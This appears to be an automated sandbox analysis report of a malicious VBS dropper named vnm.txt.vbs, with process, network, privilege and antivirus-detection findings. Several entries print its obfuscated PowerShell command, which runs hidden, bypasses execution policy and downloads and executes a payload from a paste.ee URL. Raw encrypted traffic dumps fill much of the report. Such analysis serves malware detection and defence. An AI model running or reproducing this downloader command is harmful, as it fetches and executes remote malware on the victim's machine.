cmdline	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 29, 2024, 5:03 p.m.	show_type: 0 filepath_r: Cmd.exe parameters: /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) filepath: Cmd.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 29, 2024, 5:03 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (20 events)

Data received	[
Data received	Wf§LÙÇ)0À°[ØíÓPÂ}±W-ï.tÀÐDOWNGRD Áï© ü2Ï¥õª³(QÞ#¤ÏÝô \|¾vÔxfë¬À ÿ
Data received	Ò
Data received	Î Ë¡00B ú«>Þ9ÙdïÖ.¬0 HÎ=0;10 UUS10U Google Trust Services10 UWE10 240622144918Z 240920144917Z010Upaste.ee0Y0HÎ=HÎ=BA>Ó-z V/¥\ô]OàêÐé¡÷!f Ärq%þ.Mç7bíþKîç°¸µíÁÂzÑÐ\|O] ?£M0I0Uÿ0U%0 +0Uÿ00UBz~<"ñã6¸ri¸N bW{0U#0w5gÄÿ¨Ì©æ{Ùy{Ìù80^+R0P0'+0http://o.pki.goog/s/we1/rfo0%+0http://i.pki.goog/we1.crt0U0paste.ee .paste.ee0U 0 0g06U/0-0+ ) '%http://c.pki.goog/we1/t4Y_tS4oQ9A.crl0 +ÖyõòðußáVëª¯µq¨À2N®VÙn§õ¥jÑÁ;¾R\@£BÏF0D ;2Áj³,ÛÊø¢<U×+vªÇëÑäÇÝ1r¤%¤ "8} Ô\åIC¼PW:Äo¤Ñ×ìãæwvÿ? ¶ûQÂaÌõº4´¤Í»)ÜhB ægLZ:t@£B3H0F!çSaÔ)),}8b?7îk&æõÑõ÷!þµ¦1 ¨¾ yÞ²ªZx¦$h]ÞvG0 HÎ=I0F!ÄsHv¬NÀ°ú@àO/Ø\ÜÜÞstÝíV!àMv$ å,´X¡P·ÐïÿB±õ0ôjeK£00% ów,"Jv]¶Öã0 HÎ=0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R40 231213090000Z 290220140000Z0;10 UUS10U Google Trust Services10 UWE10Y0HÎ=HÎ=BoÍ:þgWGL!@ÂG]»XG@Á\Æ7çÕ\|íKÙ×¥ øÄÆèÿY,&õæ&%»úV£þ0û0Uÿ0U%0++0Uÿ0ÿ0Uw5gÄÿ¨Ì©æ{Ùy{Ìù80U#0LÖëtÿI6£ÕØüµ>Åjð04+(0&0$+0http://i.pki.goog/r4.crt0+U$0"0 http://c.pki.goog/r/r4.crl0U 0 0g0 HÎ=h0e1ç«QÖ÷CÎuþÑÕÌ@Az&¾Øó2-=®#HR>dy¯õ¦,nU±0&Ìhbç«~èÖD~ãLI¿lb4¸²¡~:P¼§ }sìRAMîâV~0z0b å0¿3C¾ÝI=0 H÷ 0W10 UBE10U GlobalSign nv-sa10URoot CA10UGlobalSign Root CA0 231115034321Z 280128000042Z0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R40v0HÎ=+"bóts§h`®C¸5Å0{KIûÁaÎæÞF½kÕa5®@Ýs÷0Zë<î\|¢@v;©Æ¸GØçjsé±r9)¢Ó_^Xe¡eÑÜÉÇsÈj/åÄ«Ñ£ÿ0ü0Uÿ0U%0++0Uÿ0ÿ0ULÖëtÿI6£ÕØüµ>Åjð0U#0`{fE ÊP/}Í4¨ÿüýK06+0(0&+0http://i.pki.goog/gsr1.crt0-U&0$0" http://c.pki.goog/r/gsr1.crl0U 0 0g0 H÷ B»Öã?c ¤¡hH9"søËN-1éç ¡Ò6¬yëé°ëj¶{}t¸e«h,,ÝBýÆqÏ-÷kÈn}Vâ#XXù%ºG× ý ¶à.®UÑyu5,1[?e¼ÍB§±^ñ»Ê-Gð¬c~¿ÖäkÓÖÓgX¸ÿ÷¦ IP[?:%ò\ÓyW6Îÿ&·©ñí>ÈnëÓ<8ÀAá^SÏ> Wëîâ?H¥ñ¾Ñj#û?/¢µ½ên£FÎ.g¯3&ªÕKÒ©6Å&;[Áå
Data received
Data received	AØÔ«{[Ì¼ræ¼1$ñÁåÊb¡ffµ'§ y?\ýgôGéÆàÚ¯À3EA¡`ÐF0D \|ºÃ:+íø×ý»À%¯hÌ5[êù±a Yw=)4E®/È^w5øë×!ÒÅé
Data received
Data received
Data received
Data received
Data received	0
Data received	zælwq@÷âÜÙFÛýìlFÝÑë~ÃdÂ*ìßíÐøj¸/x
Data received	p
Data received	©è <Å º8ÀSÛ%ò"N$JÑRuý$:ÂMvÿÓ¢íiW^¯KñÊì¯g¡[y>¯ÛÀä@SÈësr+ Hi££Aàû/«0ìü]¿{QUÐl$:J eÞMÖbU_dú±pØÐ"³;Ëa²Ù8E¼ñd{RØXÏ»óª01-xl]T\|aÌ¦z Ü®Rå³äpc>Øh¹¬ãy÷v>áï\|ýòÚöjH~Ê,1g'0Ö Å´×@èÂd<=]}ènJ@ %pð÷Ý2®-v©öÞ¨nÿT%Õ j"Fë±fçgi¤]!aÔa7çjh8B£}Å#<£"¸ A·k@ã '·2Ë+6Õx 7¤¨ÇeÙT©!Ý¸O¼ök\|u&óÐ¸ATâÊÝùÂv²uñÒçw+¿T©"u®lYð#<Q²©I¶åû'HÀ¼O»î½Úðy Â`¶êéÁ+Ñ\|ÅÙåGóDÚu2xPêÁ 2ÑqÊPäb-A5 EõïÇWÑ}ëRÂ¦äS"¥á\|¦Jp´¼¡Bç$«ÝCúÃÚÐÌ£ýÂ;Ï{Ô3Õ:²òá?Ô®úqe0«àRÇ£,½º}ÍníR`ñîô³²}%úêþÁÜ©e¹Ch~ 8ï`ÌºêÕo&`é`O²{Ú-'öë8r.â R<¾EK nþ½»<.qvTqâÎþ¤«bz©¤õâ²ÑöT½Sh¤5#~Äðô^0ôRT#8Õ¶éÕL:tKW ïnìf,½ÌþcµµßÆëuü"%w¤à½¨×÷Ø¦lúÃ3®ÌâÈº·ÛÙ£ø{OE«ì(¢ÔSè«Tj#CýiÍ_Æ m(':ÐfìC¥NT· OB%p´&>ërµ`ëÚsi5sÁrZq\|ÞØÛ½qüªÔ}¡b¥Ýû=M\|Ì&OGo^mlC]ÃøöÂ`!:\|¬ì¥Æ=M¨x$!Hý#Á±å«}a¶ô¿áÕ&TH?\|þ"Wºà#òÚmÚà£ÖòN{MÄKÛ7Ð:×ÏTµ3¶ÓIeûò pä>Â·»#¾²¯ML±Câl£H.áñ°á5årmÄ¸K.Ø÷ÔÀþüÂ$Ï)ÚKÕÁ¤²C¶ BDC@è¾cR«¼ÐC»yÏ ¢l4ÿ3£T¹ÏmÍ 'd,ßàÅX¾d °;«ÄÍ½ûE8mþ0Rmª0±ÂBÇ(!<²U\8³pÛw.äs®ðP¹/ïR¾,Ä,ÕG{B¿¤zÂ±YAÁòñMAã±7ì\j¾--§(ã47è½îßHÌÈ1eT^ö¡¥Óp3R>))mõ}â¬¶ QÛ©÷¿?©?\|Õº;{<0Ù8¦Ø;¸¼ëÉ¬zB w Me@ß´ª(#9iô¤Å#^ìmYDåM>&Ãö)¬Ù<È8ÐnÃ'À¥qJÞºìz÷¥a®1Cm4Ò¿þk`²«d0UéÆ·^Hà$·ä8Þ83´Fà[JzvKYÐÀ0ni#Cù6ÒxïÐkÓãK#-ßÇ¸1£_°YÓÍèÓÉD±~ñÂ£Ðä14# ³
Data received	>°#¦¶E Wä£<O¯eze»B$Ø,ZÝëð3f1 LoËþ0}Ý!Õ<\|X9/²!oÚÜú£Äwôþ¼6ÁWv0X6«{¬ö&f·þÅ ª5crÒ2÷®ãµ~ßÆ´&Xb :<ÈÓÈ^ ¯ BHRU1w3Þ/»òì)Óê½coéÑqyf¼ff÷ÝoõÊÑJ¸´lú)X.²NÉ\F9£èÀ¬Ò(.>®´±Üó"68«MåaÄ47f§Í<ò:}ÚÎ¡ËBçT9m)>º}¢;UáØkw!Év9Æ¼.Kö :<W¥iì_zvP \|Vtû:AÍAoðvèV,V+ñØ¸¶#¥Ruýrãl~tÜÕLKVè'Uán1+e?ípì{Ë¶Ö&iàÏSC9Î×]QÜ?Þ:IZU(£²VëÃ2Àà¾-ù2$AõÁ© 'L·äYÇ/a9mò ¦¸_{lÍPBðzf_}SÏö´ 7¯ÉPñô¤nèýUe ZÄôs\4yi)«§ß£ñÄ²æyÿÃoÞáÅ)1;õÝL^ÁÂ¦¡-µc&wRÒ^õsX{Msù;1&¡ª . t´¯SÆ{ý¥ÍNNhd<ÌÿIÐ¦ÛB{ô×Pi e»Ç¾ß«=ÁqË¸#È¼DµÔìÉ 2FÚêWq>ÒñÐZç³ª¹ý6·ÅZÜì¢×k^$Yë®;óvA;«^%íÿh5x>}cÑví øpóå~Fvá^§VÐvLºÂýÝVN·hlúÊhß÷!Ðí÷ Ù%b»Æ^tÚaÍZEÎÊW¸ôÊÑ49¼rõêÞü[^HõI¢PÑûSeÍ$[AêíÑ¤qêÂôÑÕÏéoóIVèìq07Ê©©üÎ>Ï÷Òmo[¨å IãU°¹]¾¬¤FÉÁ´+Èxó÷aÁË!V¡=yeu©>Àé@óúÑG-ØiÈ½¦Sÿaèä¤¡S%]8¹¿ äÛoqZO%T#S,ADÍJl]lºù+ \T¦=ý¬¯Kï{G'=x÷\Ì ·n²Öí$[ÁÇ(â2ü+©5ÍI7ã¡1ÃñSwMÐníq ÑÎF:\>^ ®ù4ÿR$²!ýå@öâJpe!Bß4KQ«ðUã½rYq¶ Céø¦Jr\|d1¤?XË¤ð_ °+é±ÿjÇºÔ!#)Îj_;b½1±mÐÑ³\ã<hlr¥½MÆ¶[x/\|qnm9ö³ýêåØ·Ûù(^þÿkGrº¦¬MNáÓÁûP}ÐÜ´ $]sâÒÿ}ÜÒ¡®½µ±:Æ6»ÆÀP´a¤¨Þ,4ÕcÜMKf©ÏIò>v}»@Uv\fMü)1ÄAÀÌ*f¶D ë=Itþ!(¦âAäöqpÄÖJ&Ç½Âtæi}óå9øWò%ÍvsjýJó={qéÔJ:cØßÙÖ-<$â®«¾7Ýo0¹oÐJ ØÖ½yM8×ö±[aTÂ;4îÝ5ìáNE#k,9ãàô½WÛ·"
Data received	°ð¦ëÊ§z§üîO¨y\|?ÍìÆ;e ê½Õ÷õË-î1ï×¥ ÔÁdËs³QZ1\ýÖî¦Â 0ÚÝGë[ÄiMR¿rÎÄ=_±-v» Tø°KÁÛ´Ç¡.ÙF³.9ÔRìÆfò"4{f`Ú"ÆaBu\|0x} à,Gó}Ö`ÖD>-PÀrÍóõÚUMpÝYÛêUÈÒ¢¯HÐÜô¯hBì¼Dê?kü2pLÏõAa´Fæªóª8Ø"eµ}âS·8ËÃêQV¬T¿m5¶óÔ:¶.kÊß¸!@w.$'^Ohêîçµ[e¡ç÷4öÐ]©}ÓÆjÄ[!cj´Â«äÐç=eÖ:MYAÓìs9JëvËa¢DG'¦"¦r_mY¹Áêçí@A±4ãèf"J²\|Æä©F._À3P¸ßo]üpík"Tt³9skÂªª1Í-Q>t¬ë¦äJf.Ò©ä7ymô1é'6leOä® Nà1}y±MB-ØT4vÀmÅwgXqiÒáÌOxr§N¢ËÔEÿf¥yFçfÆû¹Þþ'\0,btÈDõs>CÌ²áò@t~t¿0ã-õ½27æßsïwC§C·#·©ììu½ÈK.@V:Ý}V\ÝÐ¨Mñvì ïÃÏ5O5©P3Ä³èïº-õGOý>` aãä!NþÌÜªvøÚ¿2ß;iZ¶_þVRdÉû¹iô2å£Ûd/¡ýHÍÜwÖ@ßíç`D±WMZnDQL\í}7Wr5¯dð¯_ß:QIPeê¸SK$² ÖÄMòK°`T5X¬ÜâùÒ~Ó.üø¾Ýºk¹z°Ni9\|Ê~a<E[,Ã©¬Ù$;;b§8%ëLªÎ5óAëù$ ºp(.·52þXãû.£ã2£a`Âm1Dé ãáì+çÍE^Ã2+1¾DàH?ñbÌ vñÀ%õÇ$y}g\|~×Tþ6ß:¸c´>@ó]¥Ä¬Ho+rbüpM}JúvÞ,iqà®©Áó,¡åt.í@MGh=ïÎzqä#¬E®Sc*rl?ðfpü;p¡x~ÒëÊT{Heì²{x@J+ìTh\ïryWoº-µõwÙµ5²y¹rb(-`)ÕyÉú¼Ó°ì Xv(÷ðl[#+0>öPh ðBéEÖÞóX,.óuYc#"sB`<T-ói¹Ôõ T:,#©Oµ½ÅáOEÙéöZvG+ªjä:[¹ªCÅQÜÀë¡Ò¹7ãneÝÆPô¶¨m¥è?Í£Oñ`û0¿5¼À±ÚÀB\;à&úürJ>y°+Ú¬Ë£´Õ(£~hñ@ùb6"ly!¼úkt!äWnÞö {÷t0ô>Xà§øÑÄÖ}ýW>LI¦7a³h"°.ù)è@>K[ÁªF3hqj¦=/1ndíLÉöèïs±Ö 1@C$3ßg@l©ÙÒnÀä¡éDe¦PºÖ«,ô&Ì·×-¡{K´påmÀÄ#Yn¯ÒQ'E®
Data received
Data received	Õ¿e5¿¡c×\|Cýpë¹íÁØðüexÔãÜ+uÕ¥¿±VµjñÑ.ï&÷òÐ´Rþ/l ¸îDÅ«Ò»V8'?Ú0f:I«¬»wýygCJÇä,°;ìbûIrXøsU¹³MÍj;X¹x¨±^gÃ<pz]cÿõ¡~ZwÁ(ëûÊ<íebú?-´92FG2@e´¡©qÀÄ4ÄwÙsm[#åbÉ¨Ãûe4)þU#SYDXæº`»ú{Å[rc,Wº>?Ì1Ìnícþ·³µó4ëÆ¸ ó¦þÇüÃvó+9BÛ¥ËÀ'IEw>h[7Ä²Þü¿/wPä^ZDÝQ°øõÈ]W-Øë¤Z-Né½2¾¬7¬øR¥<2êP°ÌoôáøMÿ1Å±7\´RÇl-ûöÞ×+ÌåÅaÐpqðîâÃªËY<rü'ÖÑ/Þ.=[Ô~x"Ùªg¶rBz[ÓËN8Ë£/ lFÏÉ2û}3´B¿T+Ý6dç·&ïÒÜjÀ"¸¼úÌ[/r5sVâ´Q²ô\|[¢vÌ7LÆ3éxnôn;YB5oéz½bÄíÝÃæg$´ö¶9j>×Ü^<¼WÚ9àÏ/¯tñ$z&ÒA¸.LÞk-ñT²^ {âj?½¢(ÒFE»%ÈK;ãã)7aÝ)8\Z(5JµGåð$Ö÷íÅøÌË.÷ã÷a¯lxQin3àOºíð\|n?^ü2¤ÂÙEkýKðòüõ3½À!iî¦fRÌjÁ®ÝY'";äÁy_í?dèV¾¸Ö§#í1:r;Íý«+ý½9T½xdw"òÄ^.I)Ò+Ì#åöôO+æ@eWÄû÷¦° aÐ6ç¾x0êg®zS×#ªÈÑ×mrÉì¸.VöïÉõB0,ÕzÍl¨"Ý µ(nfËÏfü'ê15Mc½GÏÞûèR ¥*ªÃ D Ö@bÕM-N»!¿y8¿SØk'&}Û:F@ð¸/Ùh¨0Î'ðæÀ¼hxö¼ÆÝÑñ¢Øf7çÄi`Àe¢þC
Data received
Data received	ûDéÌÕ Ôà±Ûøàë2¼ÅTø[t&}r)°

Poweshell is sending data to a remote host (3 events)

Data sent	kgf§LÉúvÄi5W27)%1øQvÁnaë/5 ÀÀÀ À 28&ÿ paste.ee
Data sent	FBAl3aý@@óÎ.¢Ø^Ô5Þ5ßdò×Õö ÞRU/Gi[m¦l=3DÒ\ÙÑ+uÎFÏ÷XjBXôG0§Xµ)cü¹. ¹oÀKÞFæÝ¥CãÌ2ñÀüFt4íÀ
Data sent	`¾GjéBG&n·Ño·þÇ;·,äé§³+,â¥èKðÝ0vs,Ö@¹{ËtceºSn`4ØßkÝî©½Wi´~× LÏ ,n¹È!¶æªÙWb¾JþG

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 29, 2024, 5:03 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

File has been identified by 12 AntiVirus engines on VirusTotal as malicious (12 events)

Symantec	ISB.Downloader!gen80
ESET-NOD32	PowerShell/Runner.A suspicious
Avast	Script:SNH-gen [PUP]
Kaspersky	HEUR:Trojan.VBS.Alien.gen
Rising	PUF.Runner/PS!8.188C4 (TOPIS:E0:V57SxEang5G)
Ikarus	Trojan.PowerShell.Agent
Google	Detected
Microsoft	Trojan:VBS/Obfuse.RTDF!MTB
ZoneAlarm	HEUR:Trojan.VBS.Alien.gen
Varist	VBS/Agent.BOL!Eldorado
huorong	TrojanDownloader/PS.NetLoader.fk
AVG	Script:SNH-gen [PUP]

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send July 29, 2024, 5:03 p.m.	buffer: kgf§LÉúvÄi5W27)%1øQvÁnaë/5 ÀÀÀ À 28&ÿ paste.ee socket: 1396 sent: 112	1	112
send July 29, 2024, 5:03 p.m.	buffer: FBAl3aý@@óÎ.¢Ø^Ô5Þ5ßdò×Õö ÞRU/Gi[m¦l=3DÒ\ÙÑ+uÎFÏ÷XjBXôG0§Xµ)cü¹. ¹oÀKÞFæÝ¥CãÌ2ñÀüFt4íÀ socket: 1396 sent: 134	1	134
send July 29, 2024, 5:03 p.m.	buffer: `¾GjéBG&n·Ño·þÇ;·,äé§³+,â¥èKðÝ0vs,Ö@¹{ËtceºSn`4ØßkÝî©½Wi´~× LÏ ,n¹È!¶æªÙWb¾JþG socket: 1396 sent: 101	1	101

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process	wscript.exe				martian_process	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/DIWK2/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

Creates a suspicious Powershell process (12 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

vnm.txt.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All